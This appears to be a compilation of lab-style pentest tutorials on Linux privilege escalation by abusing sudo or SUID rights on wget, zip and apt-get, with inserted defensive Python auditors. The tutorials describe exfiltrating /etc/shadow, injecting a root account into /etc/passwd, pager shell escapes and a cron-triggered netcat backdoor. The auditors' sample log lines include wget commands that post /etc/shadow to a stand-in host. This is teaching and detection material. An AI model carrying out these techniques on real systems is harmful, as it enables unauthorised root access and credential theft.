Linux for Pentester: Wget Privilege Escalation

In this article we describe the Wget command, its main uses, and why it matters in Linux penetration testing. Wget is normally used to download files from a server; here we will see what else the command can do once it runs with elevated privileges, and how that leads to privilege escalation.

Table of Content

Introduction to Wget

  • Major Operation performed using Wget

Exploiting Wget

  • Sudo Rights Lab setups for Privilege Escalation
  • Exploiting Sudo rights
  • SUID Lab setups for Privilege Escalation
  • Exploiting SUID

Introduction to Wget

The Wget command is a command-line utility that lets a user download one or more files from the internet or a server over protocols such as HTTP, HTTPS and FTP. It supports many operations that are useful when fetching files, such as downloading multiple files, downloading in the background, resuming an interrupted download, renaming the downloaded file, and mirroring a site.

Wget's full set of options can be reviewed through its help output, requested with the -h argument. The image below shows the long list of arguments that wget accepts; to view it yourself, simply run the command shown in the screenshot:

Major Operation performed using Wget

To download a file: Wget can fetch any file or web page either in the foreground of the current terminal or in the background. Here I'm downloading putty.exe to demonstrate how Wget works. To download a single file, use the simple syntax: wget (option) URL

To download a file in the background: Wget is a non-interactive downloader, so it can fetch a file in the background without interfering with whatever else is running in the current session.

Here I'm using the -b argument for this, with the full command shown below.

To write the download to a different file: The image below shows how to save the downloaded content under a different file name, using the -O (uppercase) argument.

Type the command below, which downloads putty.exe and writes the output to raj.exe.

Halfway through the download I pause it by pressing Ctrl+C, stopping it mid-session, in order to show how a download can be resumed after a network failure, a power cut or any other interruption.

To resume a download: As mentioned above, if a download fails for any reason, the incomplete download can be resumed with the -c argument. See the command in the screenshot below:

To download multiple files simultaneously: Wget can also download several files at once rather than one by one. If we have a file that lists several links and want to download all of them together, we pass that file with the -i argument.

Here I'm creating a file named "link" that contains two links, and I want to download both together. Type the command below to do so:

To turn off output: To suppress the output of a download, use the -q argument. It silences wget's standard output, so the file is downloaded quietly, which is convenient when running in the background.

We will use wget with the -q argument as shown below.

Wget has many more options, but in this post we have covered only a few of them, because our aim is to demonstrate privilege escalation by exploiting wget. In the next phase you will learn how wget can be abused to escalate to a root shell.

Exploiting wget

Sudo Rights Lab setups for Privilege Escalation

Now we will set up a lab in which wget runs with higher privilege, i.e. with administrative rights. The behaviour of many commands changes once they run with elevated privileges, so we will check what effect granting sudo rights on wget has and how that can be used for privilege escalation.

Refer to this link for more information about sudo rights

The image below shows this clearly: I have created a local user (test) who has been given sudo rights as root and can therefore perform the task as an administrator.

To grant the sudo right, open the /etc/sudoers file and add the following line under the user privilege specification.

Exploiting Sudo rights

Now we will exploit wget by taking advantage of the sudoers permission. Suppose we have obtained a session on the victim's machine as a local user, from which we want to escalate to root.

First we connect to the target machine over SSH; type the following command to log in as the local user.

Then we check the sudo rights of the "test" user (if any) and find that "test" can execute wget as "root" (the entry grants it for ALL hosts) without a password.

Wget's --post-file option sends the contents of a file in the body of an HTTP POST. Here we use it to transfer the contents of /etc/shadow.

Since --post-file sends the shadow file's contents to the listening IP, we need a listener on the destination machine. Open a new terminal and start a netcat listener to receive the data sent from the source machine.

Type the below command:

We had already started the netcat listener on port 80, redirecting whatever it receives into the "hash" file.

As a result, the contents of the victim's shadow file land in our hash file, and we then use John the Ripper to crack the hashes.

As the image below shows, it has cracked the password for user raj.

Since we now have credentials for the user raj, we can switch to that user, log in as raj, and then try to reach a root shell by switching again.

Finally we obtain root access; this is how a root shell is spawned by exploiting sudo rights on wget.
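From the defender's side, a sudo-allowed wget leaves a trace of the technique above in the sudo log: every invocation is written to /var/log/auth.log with the user, the run-as user and the full command line. The following added example (not code from the original article) scans auth.log-style sudo lines for root wget invocations that post a sensitive file or write into a protected directory with -O. It assumes the line format sudo writes to syslog on Debian/Ubuntu; the sample lines, host name and 192.0.2.x addresses are constructed.

```python
"""Flag risky sudo invocations of wget in /var/log/auth.log-style lines.

Added example; not code from the original article. Assumes the line format
sudo writes to syslog on Debian/Ubuntu:
  <date> <host> sudo: <user> : TTY=... ; PWD=... ; USER=<runas> ; COMMAND=<cmd>
The sample lines below are constructed (users, host and 192.0.2.x addresses).
"""
import re
import shlex

# One regex for the sudo log line; the COMMAND field runs to end of line.
SUDO_LINE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:.*?USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<cmd>.*)$"
)

# Files whose contents must never be sent off-host in a POST body.
SENSITIVE_PATHS = ("/etc/shadow", "/etc/passwd", "/etc/sudoers", "/root/")
# Directories that a root wget must never write into with -O.
PROTECTED_DIRS = ("/etc/", "/root/", "/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/")


def classify_wget(argv):
    """Return the reasons a wget command line (run as root) looks like abuse."""
    reasons = []
    args = iter(argv[1:])
    for arg in args:
        # --post-file=/path or --post-file /path: sends the file's contents away
        if arg.startswith("--post-file"):
            path = arg.split("=", 1)[1] if "=" in arg else next(args, "")
            if path.startswith(SENSITIVE_PATHS):
                reasons.append(f"exfiltration of {path} via --post-file")
        # -O /path or --output-document=/path: remote content replaces a local file
        elif arg == "-O" or arg.startswith("--output-document"):
            path = arg.split("=", 1)[1] if "=" in arg else next(args, "")
            if path.startswith(PROTECTED_DIRS):
                reasons.append(f"overwrite of {path} via -O")
    return reasons


def scan_auth_log(lines):
    """Return (user, command, reasons) for each root sudo wget line that is flagged."""
    findings = []
    for line in lines:
        m = SUDO_LINE.search(line)
        if not m or m.group("runas") != "root":
            continue
        argv = shlex.split(m.group("cmd"))
        if not argv or argv[0].rsplit("/", 1)[-1] != "wget":
            continue
        reasons = classify_wget(argv)
        if reasons:
            findings.append((m.group("user"), m.group("cmd"), reasons))
    return findings


# Constructed sample log: two abusive lines, one benign download, one sshd line.
SAMPLE_AUTH_LOG = [
    "Jul 10 10:01:02 ubuntu sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=root ; "
    "COMMAND=/usr/bin/wget --post-file=/etc/shadow http://192.0.2.10",
    "Jul 10 10:02:15 ubuntu sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=root ; "
    "COMMAND=/usr/bin/wget http://192.0.2.10/passwd -O /etc/passwd",
    "Jul 10 10:03:40 ubuntu sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=root ; "
    "COMMAND=/usr/bin/wget https://example.invalid/putty.exe",
    "Jul 10 10:04:01 ubuntu sshd[1234]: Accepted password for test from 192.0.2.20 port 51000 ssh2",
]

if __name__ == "__main__":
    for user, cmd, reasons in scan_auth_log(SAMPLE_AUTH_LOG):
        print(f"{user}: {cmd}\n  -> {'; '.join(reasons)}")
```

The -O rule is included because the same check applies whenever wget is sudo-allowed: a root wget that can write anywhere is as dangerous as one that can read anywhere. On a real host, feed the function the lines of /var/log/auth.log (or journalctl output for the sudo unit) and alert on any non-empty result.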

SUID Lab setups for Privilege Escalation

SUID (Set User ID) is a permission that lets users execute a file with the permissions of the file's owner. Files with the SUID bit set run with those higher privileges. If we are on the target system as a non-root user and find SUID-enabled binaries owned by root, those files, programs or commands run with root privileges.

Read more from here: https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/

Now we will set the SUID bit on wget so that a local user can run wget with root's privileges.

Type the following to enable the SUID bit:

Exploiting SUID

Now compromise the target system again and use the find command to identify binaries with SUID permission.

We find that the SUID bit is set on many binaries, but we are interested in /usr/bin/wget.

Since wget has SUID permission, we will take advantage of it to escalate to root by injecting a new user into the /etc/passwd file.

First we read /etc/passwd with the tail command, which prints the end of the file and shows that it ends with the user "test".

Next we create a salted password hash for our new user using "openssl", with the command shown in the screenshot below.

This gives a hash value like "$1$ignite$3eTbJm980Hz.k1NTdNxe1"; copy it for later use.

Continuing, I copy the entire contents of /etc/passwd to our local machine, add a new record for the user "ignite", and paste the hash copied above into that record as shown below.

Name this file passwd and start a Python HTTP server to transfer it to the victim's machine.

Now we inject our modified passwd file into /etc to replace the original. Using wget with -O, we download the passwd file from our machine (Kali Linux) into the /etc directory, which overwrites the existing passwd file.

Now let's switch to ignite, which has the root user's privileges, and access the root shell.

As the image below shows, we have escalated to root by abusing the SUID permission on wget.
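The find command used above is also the defender's first check: a SUID root copy of wget (or of any other program that can read or write arbitrary files) is a finding in itself. The following added example, which is not code from the original article, walks a directory tree, lists every SUID/SGID regular file, and flags those whose name is on a watch list and which are owned by the privileged uid. It builds a throwaway tree as constructed sample data so it runs offline; the watch list is an assumption to be extended per environment.

```python
"""Audit a directory tree for SUID/SGID files and flag dangerous ones.

Added example; not code from the original article. It builds a throwaway
tree (constructed sample) so it runs offline; on a real host call
audit_suid("/") and diff the output against a known-good baseline.
"""
import os
import shutil
import stat
import tempfile

# Programs that are not SUID on a stock install and, when SUID root, give an
# unprivileged user arbitrary file read or write (wget -O is the case the
# article shows). Assumed watch list; extend it for your environment.
WATCH_LIST = {"wget", "zip", "apt-get", "apt", "vim", "find", "bash", "python3"}


def audit_suid(root, privileged_uid=0):
    """Return sorted (relative path, owner uid, mode string, flagged) tuples
    for every regular file under root with the SUID or SGID bit set.
    flagged is True for a SUID file owned by privileged_uid whose name is on
    the watch list."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                continue
            flagged = (bool(st.st_mode & stat.S_ISUID)
                       and st.st_uid == privileged_uid
                       and name in WATCH_LIST)
            results.append((os.path.relpath(path, root), st.st_uid,
                            stat.filemode(st.st_mode), flagged))
    return sorted(results)


def build_sample_tree():
    """Constructed tree: a SUID 'wget' (the article's lab setup), a plain 'ls'
    and an SGID 'wall'. Files are owned by whoever runs this script."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("wget", 0o4755), ("ls", 0o755), ("wall", 0o2755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")  # placeholder content, never executed
        os.chmod(path, mode)
    return root


def audit_sample_tree():
    """Build the sample, audit it treating the current user as the privileged
    owner (the temp files are ours, not root's), then clean up."""
    root = build_sample_tree()
    try:
        return audit_suid(root, privileged_uid=os.getuid())
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for rel, uid, mode, flagged in audit_sample_tree():
        print(f"{mode} uid={uid} {rel}{'  <-- dangerous' if flagged else ''}")
```

Run against a real system, the useful output is the diff between today's list and a baseline taken at install time: a new SUID entry such as /usr/bin/wget is exactly what the lab setup above creates, and removing the bit (chmod u-s) is the fix.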

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer; she is an enthusiastic pentester and Security Analyst at Ignite Technologies.

Linux for Pentester : ZIP Privilege Escalation

Today we are going to show how privilege escalation can be performed with the zip command. Zip is an easy-to-use, cross-platform file packaging and compression utility for Unix-like systems such as Linux, as well as Windows and others. The zip program is used for compressing and packaging files.

Table of Content 

  • Introduction to ZIP
  • Major functions of ZIP command
  • Sudo Rights Lab setups for Privilege Escalation
  • Exploiting Sudo rights

Introduction to ZIP

Zip is useful for packaging a number of distribution files, archiving files, and saving disk space by temporarily compressing unused files or directories. A whole directory structure can be packed into a single zip archive with one command. For text files, compression ratios of 2:1 to 3:1 are common. But that's not all: what else can we do with zip? Let's think outside the box and try something you may not have tried before, namely privilege escalation with the zip command. To understand how, we first go over what zip does on Linux. So, let's start.

Major Operations Performed Using ZIP command

First, run zip -h (help), which lists all the options available in the zip command, as shown in the picture below.

Our first step is to make a directory. We create a directory named Ignite and then create some text files in it with the touch command.

As you can see, we have created three text files, file1.txt, file2.txt and file3.txt, in the Ignite folder. Now we zip file1.txt and file3.txt into an archive named file.zip, giving the archive name followed by the file names.

After this step, we use ls -la to list the files.

Delete with -d option

The -d option deletes a file from the zip archive. After generating the archive, a file can be removed from it with -d, as we do here with file3.txt: specify the archive name first, then the file to delete.

Update with -u option

You will notice that file3.txt has been deleted from file.zip. Now we want to update the archive by adding a text file directly to it, so we use the -u option.

With the above command, you will notice that file2.txt has been added directly to the archive, i.e. file.zip.

Move Multiple files with -m option

Now we create files with different extensions in our Ignite directory: two .txt files, two .pdf files and two .jpg files. To move files into a zip archive (rather than copy them), we use the -m option. Here we use -m to move all the text files into an archive with the following command:

As ls -la shows, all the text files have been moved into the zip archive and deleted from their original location, which confirms that the operation succeeded. We now try the same on the pdf and jpg files, moving them into an archive named 1.zip.

Execute system command using zip

You may not have considered what else zip can do. It can run any Linux command, as we are about to show. First, we create a text file with touch as before; the file raj.txt is created. Now we execute a Linux command through zip by running the following command against the zip file, and we get the output.

As you can see, we have executed a system command through the zip command.

Exploiting Zip

Sudo Rights Lab setups for Privilege Escalation

The behaviour of zip changes when it runs with higher privilege. Suppose the system administrator has given the local user sudo permission to run zip; once the system is compromised, this can lead to privilege escalation. So here we add the test user to the sudoers file so that test has the root privileges needed to run the zip command via sudo.

Now imagine obtaining a privileged shell on the victim's machine by exploiting the zip program. It may be hard to believe, but it is very easy to do. First, from Kali's terminal, connect to the Ubuntu machine over SSH as shown below:

Well done. We have connected through SSH successfully.

Now we run sudo -l to list the sudo entries that apply to this user. The list shows that test is a member of the sudoers file and can run the zip program with root privilege.

Let’s exploit!!

First we create a file with touch, here raj.txt, and then we compress raj.txt and use zip to obtain a shell by running the following command:

We can now see that we have successfully obtained a shell on the victim's machine through the zip command.

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer on Information Security at Hacking Articles.

Linux for Pentester: APT Privilege Escalation

In this article we'll discuss the functionality of APT (apt-get), see how useful the apt command is in Linux penetration testing, and learn how apt can be leveraged to obtain a higher-privileged shell.

Table of Content

Introduction to APT (apt-get)

  • Major Operation performed using APT (apt-get)

Exploiting APT (apt-get)

  • Sudo Rights Lab setups for Privilege Escalation
  • Exploiting Sudo rights: Method -I
  • Exploiting Sudo rights: Method -II
  • Exploiting Sudo rights: Method -III
  • Crontab Lab setups for Privilege Escalation
  • Exploiting Cron job

Introduction to APT (apt-get)

The apt command is a powerful command-line tool, which works with Ubuntu’s Advanced Packaging Tool (APT) performing such functions as installation of new software packages, upgrade of existing software packages, updating of the package list index, and even upgrading the entire Ubuntu system.

Actions of the apt command, such as installation and removal of packages, are logged in the /var/log/dpkg.log log file.

For further information about the use of APT, type:

Major Operation performed using APT (apt-get)

  • Update the package index: The APT package index is essentially a database of the packages available from the repositories defined in the /etc/apt/sources.list file and in the /etc/apt/sources.list.d directory. To update the local package index with the latest changes made in the repositories, type the following:

  • Upgrade packages: Over time, updated versions of the packages installed on your computer may become available from the package repositories (for example security updates). To upgrade your system, first update your package index as outlined above, and then type:

  • Install a package: Installing packages with the apt tool is quite easy. For example, to install the OpenSSH server, type the following:

  • Uninstall a package: Use the remove subcommand to uninstall software packages without removing their configuration files.

  • Remove installed packages completely: To remove software packages together with their configuration files, use the 'purge' subcommand as shown below.

Exploiting APT (apt-get)

Sudo Rights Lab setups for Privilege Escalation

The behaviour of apt-get changes when it runs with higher privilege. Suppose the system administrator has given the local user sudo permission to run apt-get; once the system is compromised, this can lead to privilege escalation.

First of all, let's revise what sudo permission is.

On Linux/Unix, the sudoers file in /etc is the configuration file for sudo rights. The word sudo stands for "superuser do", i.e. perform a task with root privilege. The sudoers file is where the users and groups that may run some or all commands as root or as another user are recorded.

So here we have given the test user sudo privilege to run apt-get as root. To add the sudo right, open the /etc/sudoers file and add the following line under the user privilege specification.

Exploiting Sudo rights: Method -I

Let's exploit apt-get by abusing the sudo right. Suppose we have local user access to the targeted system and want to escalate to root.

So, first we connect to the target machine over SSH and type the following command to log in as the local user.

Then we check the sudo rights of the "test" user (if any) and find that "test" can execute the apt-get command as "root" (the entry grants it for ALL hosts) without a password.

To exploit the sudo right through apt, we just run the following command, which invokes bash for us with root privilege as shown in the image below.
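The sudoers entries that the wget, zip and apt-get lab setups in these articles create all share one shape: an ordinary user may run, as root and without a password, a program that can spawn a shell or read and write arbitrary files. The following added example (not code from the original articles) parses sudoers user specifications and reports such entries. The sample sudoers text is constructed, and the watch list of shell-capable binaries is an assumption drawn from the tools these articles abuse plus a few well-known others; alias and include lines are skipped rather than resolved.

```python
"""Audit sudoers rules for entries that hand an ordinary user a root shell.

Added example; not code from the original articles. It parses user
specifications of the common form
    user  host=(runas) [NOPASSWD:|NOEXEC:|...] cmd1, cmd2
and skips Defaults, alias and include lines. The sample sudoers text is
constructed, and the watch list of shell-capable binaries is an assumption
based on the tools these articles abuse (wget, zip, apt-get) plus a few
well-known others.
"""
import re

SHELL_CAPABLE = {"wget", "zip", "apt-get", "apt", "bash", "sh", "vim", "find", "python3"}

RULE = re.compile(
    r"^(?P<user>[^\s#]+)\s+(?P<host>\S+)\s*=\s*"   # user host=
    r"(?:\((?P<runas>[^)]*)\)\s*)?"                # optional (runas[:group])
    r"(?P<tags>(?:[A-Z]+:\s*)*)"                   # NOPASSWD:, NOEXEC:, ...
    r"(?P<cmds>.+)$"                               # comma-separated commands
)


def parse_sudoers(text):
    """Return one dict per user specification found in the sudoers text."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drops comments and #include lines
        if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias",
                                        "Host_Alias", "Runas_Alias")):
            continue
        m = RULE.match(line)
        if not m:
            continue
        runas = (m.group("runas") or "root").split(":")[0].strip() or "root"
        tags = {t.rstrip(":") for t in re.findall(r"[A-Z]+:", m.group("tags"))}
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append({"user": m.group("user"), "runas": runas, "tags": tags, "cmds": cmds})
    return rules


def assess(rule):
    """Return findings for one rule; empty if it cannot be used to become root."""
    findings = []
    if rule["user"] == "root" or rule["runas"] not in ("root", "ALL"):
        return findings
    for cmd in rule["cmds"]:
        name = "ALL" if cmd == "ALL" else cmd.split()[0].rsplit("/", 1)[-1]
        if name == "ALL":
            findings.append(f"{rule['user']}: ALL commands as {rule['runas']}")
        elif name in SHELL_CAPABLE:
            how = "without a password" if "NOPASSWD" in rule["tags"] else "with a password"
            guard = "" if "NOEXEC" in rule["tags"] else ", no NOEXEC"
            findings.append(f"{rule['user']}: {cmd} as {rule['runas']} {how}{guard} (shell-capable)")
    return findings


def audit_sudoers(text):
    """Flatten assess() over every rule."""
    return [f for rule in parse_sudoers(text) for f in assess(rule)]


SAMPLE_SUDOERS = """\
# Constructed sample /etc/sudoers for this example
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
# Lab-style entries like the ones these articles set up
test    ALL=(root) NOPASSWD: /usr/bin/wget, /usr/bin/zip, /usr/bin/apt-get
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
deploy  ALL=(www-data) /usr/bin/git
#includedir /etc/sudoers.d
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

The NOEXEC tag is reported because it is the one sudoers-level mitigation for escapes like the changelog pager trick in Method II: it stops the allowed program from executing further programs. It does nothing against wget's --post-file or -O, which need no child process, so those entries should simply not exist; the watch list is deliberately short and should be extended from a source such as GTFOBins for a real audit.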

Exploiting Sudo rights: Method-II

apt-get can also be used to view the changes made in a packaged version of a project. We can therefore enter the following command to call up a changelog, which is displayed in a pager, like man, with the change history of the source package.

This opens the changelog in a man-like pager; here we can type "!/bin/sh" and press Enter to have the pager spawn a shell for us.

We get a "#" prompt, which means we have successfully escalated to a root shell, as shown in the following picture.

Exploiting Sudo rights: Method-III

Instead of using apt-get to invoke /bin/bash directly, we can use dpkg to build a package. We first create a temporary directory, build a package in it that calls /bin/bash, and then install that package via apt-get.

Crontab Lab setups for Privilege Escalation

This technique relies on a situation in which the apt.conf.d directory is writable and a cron job is scheduled to update the package index with apt-get update. As noted, for the lab we gave /etc/apt/apt.conf.d full (world-writable) permissions.

Then we schedule the task with crontab so that the package update runs every 2 minutes, as shown in the image below:

*/2 * * * * root apt-get update

Exploiting Cron job

Let's exploit apt-get by abusing the cron job; as we all know, cron jobs in the system crontab run as root. Suppose we have local access to the targeted system with a limited shell and want root user rights.

So, first we connect to the target machine over SSH and type the following command:

We know from the lab setup that the apt.conf.d directory is fully writable (you can also confirm which directories are writable with the find command). Therefore, we create a malicious file inside apt.conf.d that runs a netcat reverse backdoor:

Start a netcat listener to catch the reverse connection from the host machine and wait up to 2 minutes for the privileged shell: the apt-get update task scheduled through crontab runs as root every 2 minutes, and when it runs it executes our netcat backdoor, giving us a reverse connection as depicted in the image.
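What makes this cron job exploitable is the combination of a root-scheduled apt-get run with an apt configuration directory that non-root users can write to; either half on its own is harmless. The following added example (not code from the original article) audits both halves: it lists root jobs in /etc/crontab-style text that run apt or apt-get, and it checks an apt.conf.d directory for group/world-writable entries and for files that set apt's command hooks. The hook keys in HOOK_KEYS are apt's own configuration options for running a command around an update or package operation, and are what any planted configuration file would have to set; the crontab text and the directory built below are constructed.

```python
"""Audit the cron job plus writable apt.conf.d combination used in this section.

Added example; not code from the original article. It (1) lists root jobs in
/etc/crontab-style text that run apt or apt-get and (2) checks the apt
configuration directory (normally /etc/apt/apt.conf.d) for group/world-writable
entries and for command hooks. The hook keys in HOOK_KEYS are apt's own
configuration options that run a command during apt-get update or package
operations. The crontab text and the directory built below are constructed.
"""
import os
import re
import shutil
import stat
import tempfile

HOOK_KEYS = ("APT::Update::Pre-Invoke", "APT::Update::Post-Invoke",
             "DPkg::Pre-Invoke", "DPkg::Post-Invoke")
WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def root_apt_cron_jobs(crontab_text):
    """Return (schedule, command) for system-crontab lines (m h dom mon dow user cmd)
    that run apt or apt-get as root."""
    jobs = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value line
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        schedule, user, command = " ".join(parts[:5]), parts[5], parts[6]
        if user == "root" and re.search(r"(^|[\s/])apt(-get)?(\s|$)", command):
            jobs.append((schedule, command))
    return jobs


def audit_apt_conf_dir(conf_dir):
    """Return findings about writability and hooks under conf_dir."""
    findings = []
    st = os.stat(conf_dir)
    if st.st_mode & WRITABLE_BY_OTHERS:
        findings.append(f"directory is group/world-writable ({stat.filemode(st.st_mode)})")
    for name in sorted(os.listdir(conf_dir)):
        path = os.path.join(conf_dir, name)
        fst = os.lstat(path)
        if not stat.S_ISREG(fst.st_mode):
            continue
        if fst.st_mode & WRITABLE_BY_OTHERS:
            findings.append(f"file {name} is group/world-writable")
        with open(path, errors="replace") as fh:
            body = fh.read()
        for key in HOOK_KEYS:
            if key in body:
                findings.append(f"file {name} sets {key} (a command run as root by apt)")
    return findings


SAMPLE_CRONTAB = """\
# constructed /etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/2 *   * * *   root    apt-get update
30 2    * * *   backup  /usr/local/bin/backup.sh
"""


def build_sample_conf_dir():
    """Constructed apt.conf.d: world-writable, one benign file, one hook file."""
    d = tempfile.mkdtemp(prefix="apt.conf.d-")
    files = {
        "10periodic": 'APT::Periodic::Update-Package-Lists "1";\n',
        # hook body is a harmless placeholder; apt would run it as root
        "99local": 'APT::Update::Pre-Invoke {"/bin/true";};\n',
    }
    for name, body in files.items():
        path = os.path.join(d, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, 0o644)
    os.chmod(d, 0o777)
    return d


def audit_sample():
    """Run both checks against the constructed data and clean up."""
    d = build_sample_conf_dir()
    try:
        return root_apt_cron_jobs(SAMPLE_CRONTAB), audit_apt_conf_dir(d)
    finally:
        shutil.rmtree(d)


if __name__ == "__main__":
    jobs, findings = audit_sample()
    for schedule, command in jobs:
        print(f"root cron job: {schedule} {command}")
    for finding in findings:
        print(finding)
```

On a real host, run root_apt_cron_jobs on /etc/crontab and the files in /etc/cron.d, and audit_apt_conf_dir on /etc/apt/apt.conf.d; a hook finding is not automatically malicious (some packaging tools install legitimate ones), but a hook in a directory that non-root users can write to is the exact condition this section exploits, and chmod 755 on the directory closes it.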

References:

https://gtfobins.github.io/

https://help.ubuntu.com/lts/serverguide/apt.html.en

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a social media and gadget enthusiast.

Linux Privilege Escalation via Automated Script

After compromising a victim's machine we usually have a low-privileged shell that we want to escalate to a higher-privileged one; this process is known as privilege escalation. In this article we discuss what privilege escalation covers and how an attacker identifies whether a low-privileged shell can be escalated. Beyond that, there are several Linux scripts that help when trying to escalate privileges on a target system. They are aimed at enumeration rather than at specific vulnerabilities or exploits, and they can save a great deal of time.

Table of Content

  • Introduction
  • Vectors of Privilege Escalation
  • LinEnum
  • Linuxprivchecker
  • Linux Exploit Suggester 2
  • Bashark
  • BeRoot

Introduction

Privilege escalation is the phase that follows the compromise of the victim's machine, in which the attacker gathers critical information about the system, such as hidden passwords and weakly configured services or applications. This information helps the attacker mount post-exploitation attacks against the machine to obtain a higher-privileged shell.

Vectors of Privilege Escalation

  • OS Detail & Kernel Version
  • Any Vulnerable package installed or running
  • Files and Folders with Full Control or Modify Access
  • File with SUID Permissions
  • Mapped Drives (NFS)
  • Potentially Interesting Files
  • Environment Variable Path
  • Network Information (interfaces, arp, netstat)
  • Running Processes
  • Cronjobs
  • User’s Sudo Right
  • Wildcard Injection

Several scripts are used in penetration testing to quickly identify potential privilege escalation vectors on Linux systems, and today we describe each script that works reliably.

LinEnum

LinEnum is a shell script for scripted local Linux enumeration and privilege escalation checks. It enumerates the system configuration; a high-level summary of the checks it performs follows.

Privileged access: checks whether the current user has sudo access without a password and whether root's home directory is accessible.

System information: hostname, networking details, current IP, etc.

User information: current user, all users with uid/gid information, root accounts, and whether password hashes are stored in /etc/passwd.

Kernel and distribution release details.

You can download it from GitHub with the following command:

Once downloaded, run it by typing ./LinEnum.sh on the terminal; it dumps all the data and system details it collected.

Let's analyse what its results show us:

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Moreover:

Super User Accounts: root, demo, hack, raaz

Sudo Rights User: Ignite, raj

Home Directories File Permission

Environment Information

And many more such things which come under the Post Exploitation.
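Two of the LinEnum user checks listed above, root accounts and password hashes stored in /etc/passwd, are also the checks that catch the passwd injection shown in the wget SUID article. The following added example (not code from the original article or from LinEnum) implements them over passwd-format text and, optionally, reports users absent from a trusted earlier snapshot. The passwd content is constructed and the hash in the injected record is a placeholder.

```python
"""Check /etc/passwd content for what LinEnum reports: extra UID 0 accounts,
password hashes kept in passwd instead of /etc/shadow, and users missing from
a baseline.

Added example; not code from the original article or from LinEnum. The passwd
text is constructed and the hash in the injected record is a placeholder.
"""
import re

# With shadow passwords, field 2 holds only a marker, never a hash.
SHADOW_MARKERS = {"x", "*", "!", "!!", ""}
# Prefixes of crypt(3) hashes: $1$ md5, $2*$ bcrypt, $5$/$6$ sha-crypt, $y$ yescrypt
HASH_PREFIX = re.compile(r"^\$(1|2[aby]?|5|6|y)\$")


def parse_passwd(text):
    """Return one dict per line; malformed lines get {'malformed': True}."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            entries.append({"line": lineno, "raw": raw, "malformed": True})
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"line": lineno, "name": name, "pw": pw, "uid": uid,
                        "gid": gid, "home": home, "shell": shell, "malformed": False})
    return entries


def audit_passwd(text, baseline_names=None):
    """Return findings as strings. baseline_names is an optional set of user
    names from a trusted earlier snapshot; any name not in it is reported."""
    findings = []
    uid0 = []
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append(f"line {e['line']}: malformed record")
            continue
        if e["uid"] == "0":
            uid0.append(e["name"])
        if e["pw"] not in SHADOW_MARKERS:
            kind = "crypt hash" if HASH_PREFIX.match(e["pw"]) else "non-shadow value"
            findings.append(f"line {e['line']}: {e['name']} has a {kind} in the password field")
        if baseline_names is not None and e["name"] not in baseline_names:
            findings.append(f"line {e['line']}: {e['name']} is not in the baseline")
    if uid0 != ["root"]:
        findings.append(f"UID 0 accounts: {', '.join(uid0)}")
    return findings


# Constructed passwd: the last record mimics the injected user from the wget
# SUID article, with a placeholder (not real) md5-crypt style hash.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
test:x:1000:1000:test,,,:/home/test:/bin/bash
ignite:$1$ignite$PLACEHOLDERnotarealhash00:0:0:root:/root:/bin/bash
"""

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD, baseline_names={"root", "daemon", "test"}):
        print(finding)
```

Feeding the function the contents of /etc/passwd from a cron job, with the baseline taken at provisioning time, turns the enumeration check into a simple integrity alarm: an injected UID 0 account with an inline hash produces three findings at once.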

Linuxprivchecker

Linuxprivchecker enumerates the system configuration and runs some privilege escalation checks as well. It is a Python implementation that suggests exploits specific to the system being examined. Use wget to download the script from its source URL.

To use it, type python linuxprivchecker.py on the terminal; it enumerates file and directory permissions and contents. The script works much like LinEnum and hunts for details about the system, network and users.

Let's analyse what its results show us.

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Network Info: Interface, Netstat

Writable Directory and Files for Users other than Root: /home/raj/script/shell.py

Checks whether root's home folder is accessible

Files with SUID/SGID permission

For example: /bin/raj/asroot.sh, a bash script with SUID permission

Linux Exploit Suggester 2

A next-generation exploit suggester based on Linux_Exploit_Suggester. It runs 'uname -r' to obtain the kernel release version and returns a list of possible exploits.

